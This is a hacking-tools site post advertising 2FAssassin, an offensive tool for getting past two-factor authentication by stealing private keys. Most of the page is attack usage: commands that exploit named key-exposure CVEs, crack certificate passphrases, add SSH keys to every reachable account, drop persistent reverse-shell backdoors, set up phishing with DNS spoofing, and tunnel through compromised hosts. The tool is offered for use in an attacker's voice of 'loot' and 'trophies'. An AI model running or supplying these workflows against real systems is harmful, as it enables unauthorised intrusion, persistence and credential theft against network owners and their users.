• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2017
  • October
  • 28
  • 2FAssassin – Bypass Two Factor Authentication

2FAssassin – Bypass Two Factor Authentication

October 28, 2017July 27, 2019 Comments Off on 2FAssassin – Bypass Two Factor Authentication
2fassassin bypass two factor authentication tutorial download 2fassassin how to bypass two factor authentication how to use 2fassassin

2FAssassin will automate the exploitations against the common vulnerabilities that lead to the private key leakage.

It can be used to compromise individual system, or the entire network using looted private keys. It also capable to analyze and identify potential private keys from a pool of gathered files, critical key information extraction in order to identify and validate the target domain, cracking and removing the passphrase, injecting arbitrary key-based backdoors to all accessible machines, building multi-chained covert tunnels by leveraging on the loopholes found in vulnerable public key authentication, sign the malware with looted private key followed by automatic bulk distribution, generate phishing site, … etc, and many many more exciting functionalities.

The effectiveness of the Two-Factor-Authentication depends on how well a user protects “something only the user has”.
– The tool looks out for getting the OTP(s) and private keys using various methods.
– The private keys can be extracted from client certificates and cracked to be used for authentication.
– The tool exploits the common vulnerabilities that caused private keys leakage.
– Propagates the compromise starting from a single machine to the entire networks via looted private keys.

 

## Features ##

[email protected]:~/2fassassin# python assassin.py -h

___ ___ _ _
|_ ) __/_\ ______ __ _ _____(_)_ _
/ /| _/ _ \ (_-<_-</ _` (_-<_-< | ‘ \+v2
/___|_/_/ \_\/__/__/\__,_/__/__/_|_||_|

 

usage: assassin.py [-h] [–target TARGET] [–silent] [–scan SCAN]
[–check CHECK] [–cert CERT] [–filetype FILETYPE]
[–user USER] [–user2 USER2] [–secret SECRET]
[–spoof SPOOF] [–gateway GATEWAY] [–mitm MITM]
[–host HOST] [–mode MODE] [–auto AUTO] [–post POST]
[–db DB] [–key KEY] [–log LOG] [–tunnel TUNNEL]
[–chain CHAIN]

Bypass 2FA – SMS, Voice, SSH

optional arguments:
-h, –help show this help message and exit
–target TARGET IP Address
–silent reduce output verbosity
–scan SCAN Network enumeration { basic | advanced }
–check CHECK Check for vulnerabilities, modules
–cert CERT Certificate management
–filetype FILETYPE Specify file *.extension
–user USER username
–user2 USER2 username2
–secret SECRET password
–spoof SPOOF spoof
–gateway GATEWAY gateway
–mitm MITM mitm
–host HOST server ip
–mode MODE mode
–auto AUTO auto mode for automation
–post POST post modules
–db DB Manage your trophies.
–key KEY keys management
–log LOG View logs
–tunnel TUNNEL Create ssh tunnel with looted private keys
–chain CHAIN The amount of connecting chain

 

 

## Example Usage ##

– Network enumeration:
./assassin.py –scan <basic | advanced> –target <ip_address | range>
./assassin.py –scan advanced –target 192.168.0.0/24
./assassin.py –scan basic –target 192.168.2.40

 

AUTOMATIC MODE
————–

* Check everythings (common vulnerabilities) that cause the private keys to leak out.
./assassin.py –check auto –mode attack

 

Network Enumeration
+
| Building Target Database
|
v
+—————————————————————————-+
|SSH-based Attacks |
|ShellShock |
|HeartBleed |
|Ceragon FibeAir IP-10 SSH Private Key Exposure |
|ExaGrid Known SSH Key and Default Password |
|F5 BIG-IP SSH Private Key Exposure |
|Loadbalancer.org Enterprise VA SSH Private Key |
|Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution|
|Quantum DXi V1000 SSH Private Key Exposure |
+————————————-+————————————–+
|
| POST Modules
v
Keys Extraction
+
| Looted Keys
|
v
Key-based Authentication

 

Manual MODE
———–

* SSH-based Attacks to get private keys
./assassin.py –check ssh –mode attack

* HeartBleed Attacks to get private keys:
./assasin.py –check heartbleed –mode attack

* Ceragon FibeAir IP-10 SSH Private Key Exposure: CVE-2015-0936
./assassin.py –check ceragon –mode attack

* ExaGrid Known SSH Key and Default Password : CVE-2016-1560
./assassin.py –check exagrid –mode attack

* F5 BIG-IP SSH Private Key Exposure: CVE-2012-1493
./assassin.py –check f5 –mode attack

* Loadbalancer.org Enterprise VA SSH Private Key
./assassin.py –check loadbalancer –mode attack

* Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution
./assassin.py –check array –mode attack

* Quantum DXi V1000 SSH Private Key Exposure
./assassin.py –check quantum –mode attack

* Check & disable Two-Factor Authentication
./assassin.py –check config –mode attack

 

POST MODE
———

* Once you looted the private keys, perform key-based authentication to all targets in the database
./assassin.py –check ssh –mode auth

 

 

Certificate Handling
———————

 

#4
Remove Passphrase <—————————+
+ |
| |
| #3 |
| Parsing Cracked Passphase |
| |
Analyze Certificate | |
+ v |
| |
| +—————————+ |
| | | +
#1 +———-> | ^^^^^^^^^^^^^^^^^^^^^ | <———+ Getting Passphrase
| PKCS#12 Certificate | { Cracking | Stealing }
| ^^^^^^^^^^^^^^^^^^^^^ | #2
| |
+———-+—–+———-+
| | keep for later use <——–+
| | 🙂 |
| | |
| | |
#5 | | #6 |
Extract Public Key <—————-+ +——————–> Extract Private Key+
+
|
v #10
Validate Domain #7 Authenticate to SSL Server <——-+
+ |
| |
v #9 |
Real Domain Hunting +—————-> Prepare Client Machine +——————–+
#8 +—————————-+ SSL/HTTPS
| Loading Client|Certificate |
+—————————-+

 

 

* Look for potential certificate files (contains private keys inside!!!)
./assassin.py –cert analyze –filetype pfx

* Cracking PKCS#12 Passphrases:
{Dictionary Attacks — using wordlist}
./assassin.py –cert crack –mode dic –filetype pfx

{Pure Brute Force + Mutation}
./assassin.py –cert crack –mode bruteforce –filetype pfx

* Dissect the certificate file + removing the passphrases + hunting for correct domain (target server)
./assassin.py –cert dissect –filetype pfx

* Preparing client machine + install cracked certificate + authenticate to SSL server
./assassin.py –cert windows –user <username> –secret <password> –host <client_machine_ip>

 

#2 Loads client-certificate
+—————–+ +—————-+ +——————+
| Attacker Machine| | Windows Client | | SSL Website |
| (2FAssassin) +———> |(172.16.173.180)+—————–> | (172.16.173.182) |
+—————–+ +—————-+ +——————+
Sends client-certificate, instruction script Authenticates to remote SSL website
#1 #3

 

 

Backdoor
——–

#4 {add keys}
‘2fassassin’ +———> account_1
#1 +———–+ |
+————-> |create user| +———> account_2
| #2 +——————–+ |
sshkey +————-> |generate RSA keypair| +———> account_3
| #3 +————————+ |
+————-> |access to remote server| ——-+———> account_4
+————————+ |
+———> account_5
|
+———> ………

 

* Add arbitrary SSH keys to all the accessible accounts
./assassin.py –check sshkey –mode attack

* Drop persistent backdoor (reverse shell) to all the accessible accounts
./assassin.py –check reverse –mode attack

 

 

Impersonation / Client Side Attacks
———————————–

 

#1
Server certificate was stolen by attacker
+————+
| Attacker | <———————————————————–+
|(2FAssassin)| |
+—-+–+—-+ |
| ^ |
| | #7 |
| | reverse shell |
| | connects back |
| | to attacker |
| | |
| | +—————-+ (normal) +———+——–+
| | | Windows Client | client auth | SSL Website |
| +——————-+(172.16.173.180)+—————–> | (172.16.173.182) |
| +———-+-+—+ +——————+
| ^ |
| #4 | |
| SSL webiste is now | |
| at 172.16.173.194 | +——————————-+ #6
| | | client download
| | #5 | malware from the
| #3 +—–+———–+ (abnormal) | phishing website
| DNS Spoofing | | client auth |
+————————-> | DNS Server | |
| |(172.16.173.191) | |
| | | |
| +—————–+ |
| |
| +——————+
+———————————————————-> | Phishing Website |
#2 Attacker cracked the server certificate, then use it | (172.16.173.194) |
to set up phishing website +——————+

* Setup phishing website + DNS Spoofing Attacks
./assassin.py –filetype pfx –spoof <phishing_server_ip> –user <username> –secret <password> –target <victim_ip> –gateway <dns_ip> –mitm <on|off>

 

 

Tunnelling
———–

* Create ssh tunnel using looted private keys (greater the chain value, longer the ssh tunnel)
./assassin.py –tunnel ssh –chain 1 –user <username> –secret password –user2 <username> –host <server_ip>
./assassin.py –tunnel ssh –chain 2 –user <username> –secret password –user2 <username2> –host <server_ip> –user3 <username3> –host2 <server_ip2>
./assassin.py –tunnel ssh –chain 3 –user <username> –secret password –user2 <username2> –host <server_ip> –user3 <username3> –host2 <server_ip2> –user4 <username4> –host3 <server_ip3>

 

Administration
—————

* View activity output:
./assassin.py –log all

* See what (e.g., credentials) you’ve got:
./assassin.py –log loot

* Find out the origin of the SSH user:
./assassin.py –log whereis –user <username>

* Find out what SSH accounts are remotely accessible:
./assassin.py –log account –host <target_host>

 

Investigation
————–

* Check if a remote host using key-based authentication
./assassin.py –check pka –mode detect

* Find out which machine hosting the user account
./assassin.py –log whereis –user <username>

* Find out what accounts can potentially be accessed by a specific user
./assassin.py –log account –host <ip_address>

 

## FAQ ##

– Error when launching network enumeration
Try loading the msgprc at msfconsole, and define the password (e.g., load msgrpc Pass=abc123)

– The user “2fassassin” not found when “./assassin.py –check sshkey –mode attack”
Try create the user manually:
useradd –force-badname 2fassassin
su 2fassassin
cd $home
ssh-keygen -t rsa

Post navigation

SQLiv – Massive SQL Injection Vulnerability Scanner
MobiSec – Mobile Penetration Testing Distribution

Related Articles

PoC Exploit for Adobe Acrobat Reader DC RCE Vulnerability (CVE-2023-21608) Released

PoC Exploit for Adobe Acrobat Reader DC RCE Vulnerability (CVE-2023-21608) Released

- Hack Tools
February 4, 2023
CVE-2023-25135: Pre-authentication RCE Vulnerability on vBulletin

CVE-2023-25135: Pre-authentication RCE Vulnerability on vBulletin

- Hack Tools
February 3, 2023
Aws-Security-Assessment-Solution - An AWS Tool To Help You Create A Point In Time Assessment Of Your AWS Account Using Prowler And Scout As Well As Optional AWS Developed Ransomware Checks

Aws-Security-Assessment-Solution – An AWS Tool To Help You Create A Point In Time Assessment Of Your AWS Account Using Prowler And Scout As Well As Optional AWS Developed Ransomware Checks

- Hack Tools
February 3, 2023
hacker gadgets
hacker phone covers

Recent Posts

PoC Exploit for Adobe Acrobat Reader DC RCE Vulnerability (CVE-2023-21608) Released

PoC Exploit for Adobe Acrobat Reader DC RCE Vulnerability (CVE-2023-21608) Released

February 4, 2023
CVE-2023-25135: Pre-authentication RCE Vulnerability on vBulletin

CVE-2023-25135: Pre-authentication RCE Vulnerability on vBulletin

February 3, 2023
Aws-Security-Assessment-Solution - An AWS Tool To Help You Create A Point In Time Assessment Of Your AWS Account Using Prowler And Scout As Well As Optional AWS Developed Ransomware Checks

Aws-Security-Assessment-Solution – An AWS Tool To Help You Create A Point In Time Assessment Of Your AWS Account Using Prowler And Scout As Well As Optional AWS Developed Ransomware Checks

February 3, 2023
CVE-2023-0179 PoC

Researcher Publishes PoC Exploit for Privilege Escalation Flaw (CVE-2023-0179) in Linux Kernel

February 3, 2023
CVE-2022-21587 & CVE-2023-22952 Vulnerabilities Being Exploited in Attacks

CVE-2022-21587 & CVE-2023-22952 Vulnerabilities Being Exploited in Attacks

February 3, 2023
Android-PIN-Bruteforce: bruteforcing the lockscreen PIN

Android-PIN-Bruteforce: bruteforcing the lockscreen PIN

February 2, 2023

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs

About Us

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Join Our Community!

Please wait...
Get the latest News and Hacking Tools delivered to your inbox.
Don't Worry ! You will not be spammed

Active Members

Submit a Tool

Hackers Handbook 2018


Grab your copy here

ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook Twitter Google-plus Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW